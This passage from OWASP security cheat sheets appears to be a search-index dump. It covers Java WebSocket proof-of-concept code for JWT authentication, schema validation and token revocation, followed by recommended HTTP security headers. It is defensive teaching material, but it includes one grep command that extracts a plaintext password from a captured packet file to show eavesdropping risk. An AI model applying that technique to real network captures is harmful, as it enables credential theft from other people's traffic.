!\");\nLOG.info(\"[AuthenticationMessageHandler] User {} authentication succeed.\", safeLoginValue);\n} else {\nresponse = new AuthenticationResponse(false, authenticationToken, \"Authentication failed !\");\nLOG.warn(\"[AuthenticationMessageHandler] User {} authentication failed.\", safeLoginValue);\n}\n} catch (Exception e) {\nLOG.error(\"[AuthenticationMessageHandler] Error occur in authentication process.\", e);\n//Build the response object indicating that authentication fail\nresponse = new AuthenticationResponse(false, \"\", \"Authentication failed !\");\n} finally {\n//Send response\ntry {\nthis.clientConnection.sendObject(response);\n} catch (IOException | EncodeException e) {\nLOG.error(\"[AuthenticationMessageHandler] Error occur in response object sending.\", e);\n}\n}\n}\n\n/**\n     * Authenticate the user\n     *\n     * @param login    User login\n     * @param password User password\n     * @return The access level if the authentication succeed or NULL if the authentication failed\n     */\nprivate String authenticate(String login, String password) {\n....\n}\n}\n

Utility class to manage JWT token - Handle the issuing and the validation of the access token. Simple JWT token has been used for the example (focus was made here on the global WS endpoint implementation) here without extra hardening (see this cheat sheet to apply extra hardening on the JWT token)

import com.auth0.jwt.JWT;\nimport com.auth0.jwt.JWTVerifier;\nimport com.auth0.jwt.algorithms.Algorithm;\nimport com.auth0.jwt.interfaces.DecodedJWT;\n\nimport java.io.IOException;\nimport java.nio.file.Files;\nimport java.nio.file.Paths;\nimport java.util.Calendar;\nimport java.util.Locale;\n\n/**\n * Utility class to manage the authentication JWT token\n */\npublic class AuthenticationUtils {\n\n/**\n     * Build a JWT token for a user\n     *\n     * @param login       User login\n     * @param accessLevel Access level of the user\n     * @return The Base64 encoded JWT token\n     * @throws Exception If any error occur during the issuing\n     */\npublic static String issueToken(String login, String accessLevel) throws Exception {\n//Issue a JWT token with validity of 30 minutes\nAlgorithm algorithm = Algorithm.HMAC256(loadSecret());\nCalendar c = Calendar.getInstance();\nc.add(Calendar.MINUTE, 30);\nreturn JWT.create().withIssuer(\"WEBSOCKET-SERVER\").withSubject(login).withExpiresAt(c.getTime())\n.withClaim(\"access_level\", accessLevel.trim().toUpperCase(Locale.US)).sign(algorithm);\n}\n\n/**\n     * Verify the validity of the provided JWT token\n     *\n     * @param token JWT token encoded to verify\n     * @return The verified and decoded token with user authentication and\n     * authorization (access level) information\n     * @throws Exception If any error occur during the token validation\n     */\npublic static DecodedJWT validateToken(String token) throws Exception {\nAlgorithm algorithm = Algorithm.HMAC256(loadSecret());\nJWTVerifier verifier = JWT.require(algorithm).withIssuer(\"WEBSOCKET-SERVER\").build();\nreturn verifier.verify(token);\n}\n\n/**\n     * Load the JWT secret used to sign token using a byte array for secret storage in order\n     * to avoid persistent string in memory\n     *\n     * @return The secret as byte array\n     * @throws IOException If any error occur during the secret loading\n     */\nprivate static byte[] loadSecret() throws IOException {\nreturn Files.readAllBytes(Paths.get(\"src\", \"main\", \"resources\", \"jwt-secret.txt\"));\n}\n}\n

JSON schema of the input and output authentication message - Define the expected structure of the input and output messages from the authentication endpoint point of view

{\n\"$schema\": \"http://json-schema.org/schema#\",\n\"title\": \"AuthenticationRequest\",\n\"type\": \"object\",\n\"properties\": {\n\"login\": {\n\"type\": \"string\",\n\"pattern\": \"^[a-zA-Z]{1,10}$\"\n},\n\"password\": {\n\"type\": \"string\"\n}\n},\n\"required\": [\n\"login\",\n\"password\"\n]\n}\n\n{\n\"$schema\": \"http://json-schema.org/schema#\",\n\"title\": \"AuthenticationResponse\",\n\"type\": \"object\",\n\"properties\": {\n\"isSuccess;\": {\n\"type\": \"boolean\"\n},\n\"token\": {\n\"type\": \"string\",\n\"pattern\": \"^[a-zA-Z0-9+/=\\\\._-]{0,500}$\"\n},\n\"message\": {\n\"type\": \"string\",\n\"pattern\": \"^[a-zA-Z0-9!\\\\s]{0,100}$\"\n}\n},\n\"required\": [\n\"isSuccess\",\n\"token\",\n\"message\"\n]\n}\n

Authentication message decoder and encoder - Perform the JSON serialization/deserialization and the input/output validation using dedicated JSON Schema. It makes it possible to systematically ensure that all messages received and sent by the endpoint strictly respect the expected structure and content.

import com.fasterxml.jackson.databind.JsonNode;\nimport com.github.fge.jackson.JsonLoader;\nimport com.github.fge.jsonschema.core.exceptions.ProcessingException;\nimport com.github.fge.jsonschema.core.report.ProcessingReport;\nimport com.github.fge.jsonschema.main.JsonSchema;\nimport com.github.fge.jsonschema.main.JsonSchemaFactory;\nimport com.google.gson.Gson;\nimport org.owasp.pocwebsocket.vo.AuthenticationRequest;\n\nimport javax.websocket.DecodeException;\nimport javax.websocket.Decoder;\nimport javax.websocket.EndpointConfig;\nimport java.io.File;\nimport java.io.IOException;\n\n/**\n * Decode JSON text representation to an AuthenticationRequest object\n * <p>\n * As there's one instance of the decoder class by endpoint session so we can use the\n * JsonSchema as decoder instance variable.\n */\npublic class AuthenticationRequestDecoder implements Decoder.Text<AuthenticationRequest> {\n\n/**\n     * JSON validation schema associated to this type of message\n     */\nprivate JsonSchema validationSchema = null;\n\n/**\n     * Initialize decoder and associated JSON validation schema\n     *\n     * @throws IOException If any error occur during the object creation\n     * @throws ProcessingException If any error occur during the schema loading\n     */\npublic AuthenticationRequestDecoder() throws IOException, ProcessingException {\nJsonNode node = JsonLoader.fromFile(\nnew File(\"src/main/resources/authentication-request-schema.json\"));\nthis.validationSchema = JsonSchemaFactory.byDefault().getJsonSchema(node);\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic AuthenticationRequest decode(String s) throws DecodeException {\ntry {\n//Validate the provided representation against the dedicated schema\n//Use validation mode with report in order to enable further inspection/tracing\n//of the error details\n//Moreover the validation method \"validInstance()\" generate a NullPointerException\n//if the representation do not respect the expected schema\n//so it's more proper to use the validation method with report\nProcessingReport validationReport = this.validationSchema.validate(JsonLoader.fromString(s),\ntrue);\n//Ensure there no error\nif (!validationReport.isSuccess()) {\n//Simply reject the message here: Don't care about error details...\nthrow new DecodeException(s, \"Validation of the provided representation failed !\");\n}\n} catch (IOException | ProcessingException e) {\nthrow new DecodeException(s, \"Cannot validate the provided representation to a\"\n+ \" JSON valid representation !\", e);\n}\n\nreturn new Gson().fromJson(s, AuthenticationRequest.class);\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic boolean willDecode(String s) {\nboolean canDecode = false;\n\n//If the provided JSON representation is empty/null then we indicate that\n//representation cannot be decoded to our expected object\nif (s == null || s.trim().isEmpty()) {\nreturn canDecode;\n}\n\n//Try to cast the provided JSON representation to our object to validate at least\n//the structure (content validation is done during decoding)\ntry {\nAuthenticationRequest test = new Gson().fromJson(s, AuthenticationRequest.class);\ncanDecode = (test != null);\n} catch (Exception e) {\n//Ignore explicitly any casting error...\n}\n\nreturn canDecode;\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void init(EndpointConfig config) {\n//Not used\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void destroy() {\n//Not used\n}\n}\n
import com.fasterxml.jackson.databind.JsonNode;\nimport com.github.fge.jackson.JsonLoader;\nimport com.github.fge.jsonschema.core.exceptions.ProcessingException;\nimport com.github.fge.jsonschema.core.report.ProcessingReport;\nimport com.github.fge.jsonschema.main.JsonSchema;\nimport com.github.fge.jsonschema.main.JsonSchemaFactory;\nimport com.google.gson.Gson;\nimport org.owasp.pocwebsocket.vo.AuthenticationResponse;\n\nimport javax.websocket.EncodeException;\nimport javax.websocket.Encoder;\nimport javax.websocket.EndpointConfig;\nimport java.io.File;\nimport java.io.IOException;\n\n/**\n * Encode AuthenticationResponse object to JSON text representation.\n * <p>\n * As there one instance of the encoder class by endpoint session so we can use\n * the JsonSchema as encoder instance variable.\n */\npublic class AuthenticationResponseEncoder implements Encoder.Text<AuthenticationResponse> {\n\n/**\n     * JSON validation schema associated to this type of message\n     */\nprivate JsonSchema validationSchema = null;\n\n/**\n     * Initialize encoder and associated JSON validation schema\n     *\n     * @throws IOException If any error occur during the object creation\n     * @throws ProcessingException If any error occur during the schema loading\n     */\npublic AuthenticationResponseEncoder() throws IOException, ProcessingException {\nJsonNode node = JsonLoader.fromFile(\nnew File(\"src/main/resources/authentication-response-schema.json\"));\nthis.validationSchema = JsonSchemaFactory.byDefault().getJsonSchema(node);\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic String encode(AuthenticationResponse object) throws EncodeException {\n//Generate the JSON representation\nString json = new Gson().toJson(object);\ntry {\n//Validate the generated representation against the dedicated schema\n//Use validation mode with report in order to enable further inspection/tracing\n//of the error details\n//Moreover the validation method \"validInstance()\" generate a NullPointerException\n//if the representation do not respect the expected schema\n//so it's more proper to use the validation method with report\nProcessingReport validationReport = this.validationSchema.validate(JsonLoader.fromString(json),\ntrue);\n//Ensure there no error\nif (!validationReport.isSuccess()) {\n//Simply reject the message here: Don't care about error details...\nthrow new EncodeException(object, \"Validation of the generated representation failed !\");\n}\n} catch (IOException | ProcessingException e) {\nthrow new EncodeException(object, \"Cannot validate the generated representation to a\"+\n\" JSON valid representation !\", e);\n}\n\nreturn json;\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void init(EndpointConfig config) {\n//Not used\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void destroy() {\n//Not used\n}\n\n}\n

Note that the same approach is used in the messages handling part of the POC. All messages exchanged between the client and the server are systematically validated using the same way, using dedicated JSON schemas linked to messages dedicated Encoder/Decoder (serialization/deserialization).

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#authorization-and-access-token-explicit-invalidation","title":"Authorization and access token explicit invalidation","text":"

Authorization information is stored in the access token using the JWT Claim feature (in the POC the name of the claim is access_level). Authorization is validated when a request is received and before any other action using the user input information.

The access token is passed with every message sent to the message endpoint and a block list is used in order to allow the user to request an explicit token invalidation.

Explicit token invalidation is interesting from a user's point of view because, often when tokens are used, the validity timeframe of the token is relatively long (it's common to see a valid timeframe superior to 1 hour) so it's important to allow a user to have a way to indicate to the system \"OK, I have finished my exchange with you, so you can close our exchange session and cleanup associated links\".

It also helps the user to revoke itself of current access if a malicious concurrent access is detected using the same token (case of token stealing).

Token block list - Maintain a temporary list using memory and time limited Caching of hashes of token that are not allowed to be used anymore

import org.apache.commons.jcs.JCS;\nimport org.apache.commons.jcs.access.CacheAccess;\nimport org.apache.commons.jcs.access.exception.CacheException;\n\nimport javax.xml.bind.DatatypeConverter;\nimport java.security.MessageDigest;\nimport java.security.NoSuchAlgorithmException;\n\n/**\n * Utility class to manage the access token that have been declared as no\n * more usable (explicit user logout)\n */\npublic class AccessTokenBlocklistUtils {\n/**\n     * Message content send by user that indicate that the access token that\n     * come along the message must be block-listed for further usage\n     */\npublic static final String MESSAGE_ACCESS_TOKEN_INVALIDATION_FLAG = \"INVALIDATE_TOKEN\";\n\n/**\n     * Use cache to store block-listed token hash in order to avoid memory exhaustion and be consistent\n     * because token are valid 30 minutes so the item live in cache 60 minutes\n     */\nprivate static final CacheAccess<String, String> TOKEN_CACHE;\n\nstatic {\ntry {\nTOKEN_CACHE = JCS.getInstance(\"default\");\n} catch (CacheException e) {\nthrow new RuntimeException(\"Cannot init token cache !\", e);\n}\n}\n\n/**\n     * Add token into the block list\n     *\n     * @param token Token for which the hash must be added\n     * @throws NoSuchAlgorithmException If SHA256 is not available\n     */\npublic static void addToken(String token) throws NoSuchAlgorithmException {\nif (token != null && !token.trim().isEmpty()) {\nString hashHex = computeHash(token);\nif (TOKEN_CACHE.get(hashHex) == null) {\nTOKEN_CACHE.putSafe(hashHex, hashHex);\n}\n}\n}\n\n/**\n     * Check if a token is present in the block list\n     *\n     * @param token Token for which the presence of the hash must be verified\n     * @return TRUE if token is block-listed\n     * @throws NoSuchAlgorithmException If SHA256 is not available\n     */\npublic static boolean isBlocklisted(String token) throws NoSuchAlgorithmException {\nboolean exists = false;\nif (token != null && !token.trim().isEmpty()) {\nString hashHex = computeHash(token);\nexists = (TOKEN_CACHE.get(hashHex) != null);\n}\nreturn exists;\n}\n\n/**\n     * Compute the SHA256 hash of a token\n     *\n     * @param token Token for which the hash must be computed\n     * @return The hash encoded in HEX\n     * @throws NoSuchAlgorithmException If SHA256 is not available\n     */\nprivate static String computeHash(String token) throws NoSuchAlgorithmException {\nString hashHex = null;\nif (token != null && !token.trim().isEmpty()) {\nMessageDigest md = MessageDigest.getInstance(\"SHA-256\");\nbyte[] hash = md.digest(token.getBytes());\nhashHex = DatatypeConverter.printHexBinary(hash);\n}\nreturn hashHex;\n}\n\n}\n

Message handling - Process a request from a user to add a message in the list. Show a authorization validation approach example

import com.auth0.jwt.interfaces.Claim;\nimport com.auth0.jwt.interfaces.DecodedJWT;\nimport org.owasp.pocwebsocket.enumeration.AccessLevel;\nimport org.owasp.pocwebsocket.util.AccessTokenBlocklistUtils;\nimport org.owasp.pocwebsocket.util.AuthenticationUtils;\nimport org.owasp.pocwebsocket.util.MessageUtils;\nimport org.owasp.pocwebsocket.vo.MessageRequest;\nimport org.owasp.pocwebsocket.vo.MessageResponse;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport javax.websocket.EncodeException;\nimport javax.websocket.RemoteEndpoint;\nimport java.io.IOException;\nimport java.util.ArrayList;\nimport java.util.List;\n\n/**\n * Handle message flow\n */\npublic class MessageHandler implements javax.websocket.MessageHandler.Whole<MessageRequest> {\n\nprivate static final Logger LOG = LoggerFactory.getLogger(MessageHandler.class);\n\n/**\n     * Reference to the communication channel with the client\n     */\nprivate RemoteEndpoint.Basic clientConnection;\n\n/**\n     * Constructor\n     *\n     * @param clientConnection Reference to the communication channel with the client\n     */\npublic MessageHandler(RemoteEndpoint.Basic clientConnection) {\nthis.clientConnection = clientConnection;\n}\n\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void onMessage(MessageRequest message) {\nMessageResponse response = null;\ntry {\n/*Step 1: Verify the token*/\nString token = message.getToken();\n//Verify if is it in the block list\nif (AccessTokenBlocklistUtils.isBlocklisted(token)) {\nthrow new IllegalAccessException(\"Token is in the block list !\");\n}\n\n//Verify the signature of the token\nDecodedJWT decodedToken = AuthenticationUtils.validateToken(token);\n\n/*Step 2: Verify the authorization (access level)*/\nClaim accessLevel = decodedToken.getClaim(\"access_level\");\nif (accessLevel == null || AccessLevel.valueOf(accessLevel.asString()) == null) {\nthrow new IllegalAccessException(\"Token have an invalid access level claim !\");\n}\n\n/*Step 3: Do the expected processing*/\n//Init the list of the messages for the current user\nif (!MessageUtils.MESSAGES_DB.containsKey(decodedToken.getSubject())) {\nMessageUtils.MESSAGES_DB.put(decodedToken.getSubject(), new ArrayList<>());\n}\n\n//Add message to the list of message of the user if the message is a not a token invalidation\n//order otherwise add the token to the block list\nif (AccessTokenBlocklistUtils.MESSAGE_ACCESS_TOKEN_INVALIDATION_FLAG\n.equalsIgnoreCase(message.getContent().trim())) {\nAccessTokenBlocklistUtils.addToken(message.getToken());\n} else {\nMessageUtils.MESSAGES_DB.get(decodedToken.getSubject()).add(message.getContent());\n}\n\n//According to the access level of user either return only is message or return all message\nList<String> messages = new ArrayList<>();\nif (accessLevel.asString().equals(AccessLevel.USER.name())) {\nMessageUtils.MESSAGES_DB.get(decodedToken.getSubject())\n.forEach(s -> messages.add(String.format(\"(%s): %s\", decodedToken.getSubject(), s)));\n} else if (accessLevel.asString().equals(AccessLevel.ADMIN.name())) {\nMessageUtils.MESSAGES_DB.forEach((k, v) ->\nv.forEach(s -> messages.add(String.format(\"(%s): %s\", k, s))));\n}\n\n//Build the response object indicating that exchange succeed\nif (AccessTokenBlocklistUtils.MESSAGE_ACCESS_TOKEN_INVALIDATION_FLAG\n.equalsIgnoreCase(message.getContent().trim())) {\nresponse = new MessageResponse(true, messages, \"Token added to the block list\");\n}else{\nresponse = new MessageResponse(true, messages, \"\");\n}\n\n} catch (Exception e) {\nLOG.error(\"[MessageHandler] Error occur in exchange process.\", e);\n//Build the response object indicating that exchange fail\n//We send the error detail on client because ware are in POC (it will not the case in a real app)\nresponse = new MessageResponse(false, new ArrayList<>(), \"Error occur during exchange: \"\n+ e.getMessage());\n} finally {\n//Send response\ntry {\nthis.clientConnection.sendObject(response);\n} catch (IOException | EncodeException e) {\nLOG.error(\"[MessageHandler] Error occur in response object sending.\", e);\n}\n}\n}\n}\n
"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#confidentiality-and-integrity","title":"Confidentiality and Integrity","text":"

If the raw version of the protocol is used (protocol ws://) then the transferred data is exposed to eavesdropping and potential on-the-fly alteration.

Example of capture using Wireshark and searching for password exchanges in the stored PCAP file, not printable characters has been explicitly removed from the command result:

$ grep -aE '(password)' capture.pcap\n{\"login\":\"bob\",\"password\":\"bob123\"}\n

There is a way to check, at WebSocket endpoint level, if the channel is secure by calling the method isSecure() on the session object instance.

Example of implementation in the method of the endpoint in charge of setup of the session and affects the message handler:

/**\n * Handle the beginning of an exchange\n *\n * @param session Exchange session information\n */\n@OnOpen\npublic void start(Session session) {\n...\n//Affect a new message handler instance in order to process the exchange only if the channel is secured\nif(session.isSecure()) {\nsession.addMessageHandler(new AuthenticationMessageHandler(session.getBasicRemote()));\n}else{\nLOG.info(\"[AuthenticationEndpoint] Session {} do not use a secure channel so no message handler \" +\n\"was affected for processing and session was explicitly closed !\", session.getId());\ntry{\nsession.close(new CloseReason(CloseReason.CloseCodes.CANNOT_ACCEPT,\"Insecure channel used !\"));\n}catch(IOException e){\nLOG.error(\"[AuthenticationEndpoint] Session {} cannot be explicitly closed !\", session.getId(),\ne);\n}\n\n}\nLOG.info(\"[AuthenticationEndpoint] Session {} message handler affected for processing\", session.getId());\n}\n

Expose WebSocket endpoints only on wss:// protocol (WebSockets over SSL/TLS) in order to ensure Confidentiality and Integrity of the traffic like using HTTP over SSL/TLS to secure HTTP exchanges.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html","title":"HTTP Security Response Headers Cheat Sheet","text":""},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#introduction","title":"Introduction","text":"

HTTP Headers are a great booster for web security with easy implementation. Proper HTTP response headers can help prevent security vulnerabilities like Cross-Site Scripting, Clickjacking, Information disclosure and more.

In this cheat sheet, we will review all security-related HTTP headers, recommended configurations, and reference other sources for complicated headers.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#security-headers","title":"Security Headers","text":""},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-frame-options","title":"X-Frame-Options","text":"

The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame>, <iframe>, <embed> or <object>. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.

Content Security Policy (CSP) frame-ancestors directive obsoletes X-Frame-Options for supporting browsers (source).

X-Frame-Options header is only useful when the HTTP response where it is included has something to interact with (e.g. links, buttons). If the HTTP response is a redirect or an API returning JSON data, X-Frame-Options does not provide any security.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation","title":"Recommendation","text":"

Use Content Security Policy (CSP) frame-ancestors directive if possible.

Do not allow displaying of the page in a frame.

X-Frame-Options: DENY

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-xss-protection","title":"X-XSS-Protection","text":"

The HTTP X-XSS-Protection response header is a feature of Internet Explorer, Chrome, and Safari that stops pages from loading when they detect reflected cross-site scripting (XSS) attacks.

WARNING: Even though this header can protect users of older web browsers that don't yet support CSP, in some cases, this header can create XSS vulnerabilities in otherwise safe websites source.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_1","title":"Recommendation","text":"

Use a Content Security Policy (CSP) that disables the use of inline JavaScript.

Do not set this header or explicitly turn it off.

X-XSS-Protection: 0

Please see Mozilla X-XSS-Protection for details.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-content-type-options","title":"X-Content-Type-Options","text":"

The X-Content-Type-Options response HTTP header is used by the server to indicate to the browsers that the MIME types advertised in the Content-Type headers should be followed and not guessed.

This header is used to block browsers' MIME type sniffing, which can transform non-executable MIME types into executable MIME types (MIME Confusion Attacks).

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_2","title":"Recommendation","text":"

Set the Content-Type header correctly throughout the site.

X-Content-Type-Options: nosniff

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#referrer-policy","title":"Referrer-Policy","text":"

The Referrer-Policy HTTP header controls how much referrer information (sent via the Referer header) should be included with requests.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_3","title":"Recommendation","text":"

Referrer policy has been supported by browsers since 2014. Today, the default behavior in modern browsers is to no longer send all referrer information (origin, path, and query string) to the same site but to only send the origin to other sites. However, since not all users may be using the latest browsers we suggest forcing this behavior by sending this header on all requests.

Referrer-Policy: strict-origin-when-cross-origin

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#content-type","title":"Content-Type","text":"

The Content-Type representation header is used to indicate the original media type of the resource (before any content encoding is applied for sending). If not set correctly, the resource (e.g. an image) may be interpreted as HTML, making XSS vulnerabilities possible.

Although it is recommended to always set the Content-Type header correctly, it would constitute a vulnerability only if the content is intended to be rendered by the client and the resource is untrusted (provided or modified by a user).

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_4","title":"Recommendation","text":"

Content-Type: text/html; charset=UTF-8

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#set-cookie","title":"Set-Cookie","text":"

The Set-Cookie HTTP response header is used to send a cookie from the server to the user agent, so the user agent can send it back to the server later. To send multiple cookies, multiple Set-Cookie headers should be sent in the same response.

This is not a security header per se, but its security attributes are crucial.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_5","title":"Recommendation","text":""},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#strict-transport-security-hsts","title":"Strict-Transport-Security (HSTS)","text":"

The HTTP Strict-Transport-Security response header (often abbreviated as HSTS) lets a website tell browsers that it should only be accessed using HTTPS, instead of using HTTP.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_6","title":"Recommendation","text":"

Strict-Transport-Security: max-age=63072000; includeSubDomains; preload

Please checkout HTTP Strict Transport Security Cheat Sheet for more information.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#expect-ct","title":"Expect-CT \u274c","text":"

The Expect-CT header lets sites opt-in to reporting of Certificate Transparency (CT) requirements. Given that mainstream clients now require CT qualification, the only remaining value is reporting such occurrences to the nominated report-uri value in the header. The header is now less about enforcement and more about detection/reporting.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_7","title":"Recommendation","text":"

Do not use it. Mozilla recommends avoiding it, and removing it from existing code if possible.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#content-security-policy-csp","title":"Content-Security-Policy (CSP)","text":"

Content Security Policy (CSP) is a security feature that is used to specify the origin of content that is allowed to be loaded on a website or in a web applications. It is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross-Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement to distribution of malware.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_8","title":"Recommendation","text":"

Content Security Policy is complex to configure and maintain. For an explanation on customization options, please read Content Security Policy Cheat Sheet

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#access-control-allow-origin","title":"Access-Control-Allow-Origin","text":"

If you don't use this header, your site is protected by default by the Same Origin Policy (SOP). What this header does is relax this control in specified circumstances.

The Access-Control-Allow-Origin is a CORS (cross-origin resource sharing) header. This header indicates whether the response it is related to can be shared with requesting code from the given origin. In other words, if siteA requests a resource from siteB, siteB should indicate in its Access-Control-Allow-Origin header that siteA is allowed to fetch that resource, if not, the access is blocked due to Same Origin Policy (SOP).

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_9","title":"Recommendation","text":"

If you use it, set specific origins instead of *. Checkout Access-Control-Allow-Origin for details.

Access-Control-Allow-Origin: https://yoursite.com

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#cross-origin-opener-policy-coop","title":"Cross-Origin-Opener-Policy (COOP)","text":"

The HTTP Cross-Origin-Opener-Policy (COOP) response header allows you to ensure a top-level document does not share a browsing context group with cross-origin documents.

This header works together with Cross-Origin-Embedder-Policy (COEP) and Cross-Origin-Resource-Policy (CORP) explained below.

This mechanism protects against attacks like Spectre which can cross the security boundary established by Same Origin Policy (SOP) for resources in the same browsing context group.

As this headers are very related to browsers, it may not make sense to be applied to REST APIs or clients that are not browsers.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_10","title":"Recommendation","text":"

Isolates the browsing context exclusively to same-origin documents.

HTTP Cross-Origin-Opener-Policy: same-origin

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#cross-origin-embedder-policy-coep","title":"Cross-Origin-Embedder-Policy (COEP)","text":"

The HTTP Cross-Origin-Embedder-Policy (COEP) response header prevents a document from loading any cross-origin resources that don't explicitly grant the document permission (using CORP or CORS).

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_11","title":"Recommendation","text":"

A document can only load resources from the same origin, or resources explicitly marked as loadable from another origin.

Cross-Origin-Embedder-Policy: require-corp

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#cross-origin-resource-policy-corp","title":"Cross-Origin-Resource-Policy (CORP)","text":"

The Cross-Origin-Resource-Policy (CORP) header allows you to control the set of origins that are empowered to include a resource. It is a robust defense against attacks like Spectre, as it allows browsers to block a given response before it enters an attacker's process.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_12","title":"Recommendation","text":"

Limit current resource loading to the site and sub-domains only.

Cross-Origin-Resource-Policy: same-site

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#permissions-policy-formerly-feature-policy","title":"Permissions-Policy (formerly Feature-Policy)","text":"

Permissions-Policy allows you to control which origins can use which browser features, both in the top-level page and in embedded frames. For every feature controlled by Feature Policy, the feature is only enabled in the current document or frame if its origin matches the allowed list of origins. This means that you can configure your site to never allow the camera or microphone to be activated. This prevents that an injection, for example an XSS, enables the camera, the microphone, or other browser feature.

More information: Permissions-Policy

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_13","title":"Recommendation","text":"

Set it and disable all the features that your site does not need or allow them only to the authorized domains:

Permissions-Policy: geolocation=(), camera=(), microphone=()

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#floc-federated-learning-of-cohorts","title":"FLoC (Federated Learning of Cohorts)","text":"

FLoC is a method proposed by Google in 2021 to deliver interest-based advertisements to groups of users (\"cohorts\"). The Electronic Frontier Foundation, Mozilla, and others believe FLoC does not do enough to protect users' privacy.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_14","title":"Recommendation","text":"

A site can declare that it does not want to be included in the user's list of sites for cohort calculation by sending this HTTP header.

Permissions-Policy: interest-cohort=()

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#server","title":"Server","text":"

The Server header describes the software used by the origin server that handled the request \u2014 that is, the server that generated the response.

This is not a security header, but how it is used is relevant for security.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_15","title":"Recommendation","text":"

Remove this header or set non-informative values.

Server: webserver

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-powered-by","title":"X-Powered-By","text":"

The X-Powered-By header describes the technologies used by the webserver. This information exposes the server to attackers. Using the information in this header, attackers can find vulnerabilities easier.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_16","title":"Recommendation","text":"

Remove all X-Powered-By headers.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-aspnet-version","title":"X-AspNet-Version","text":"

Provides information about the .NET version.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_17","title":"Recommendation","text":"

Disable sending this header. Add the following line in your web.config in the <system.web> section to remove it.

<httpRuntime enableVersionHeader=\"false\" />\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-aspnetmvc-version","title":"X-AspNetMvc-Version","text":"

Provides information about the .NET version.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_18","title":"Recommendation","text":"

Disable sending this header. To remove the X-AspNetMvc-Version header, add the below line in Global.asax file.

MvcHandler.DisableMvcResponseHeader = true;\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-dns-prefetch-control","title":"X-DNS-Prefetch-Control","text":"

The X-DNS-Prefetch-Control HTTP response header controls DNS prefetching, a feature by which browsers proactively perform domain name resolution on both links that the user may choose to follow as well as URLs for items referenced by the document, including images, CSS, JavaScript, and so forth.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_19","title":"Recommendation","text":"

The default behavior of browsers is to perform DNS caching which is good for most websites. If you do not control links on your website, you might want to set off as a value to disable DNS prefetch to avoid leaking information to those domains.

X-DNS-Prefetch-Control: off

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#public-key-pins-hpkp","title":"Public-Key-Pins (HPKP)","text":"

The HTTP Public-Key-Pins response header is used to associate a specific cryptographic public key with a certain web server to decrease the risk of MITM attacks with forged certificates.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_20","title":"Recommendation","text":"

This header is deprecated and should not be used anymore.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#adding-http-headers-in-different-technologies","title":"Adding HTTP Headers in Different Technologies","text":""},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#php","title":"PHP","text":"

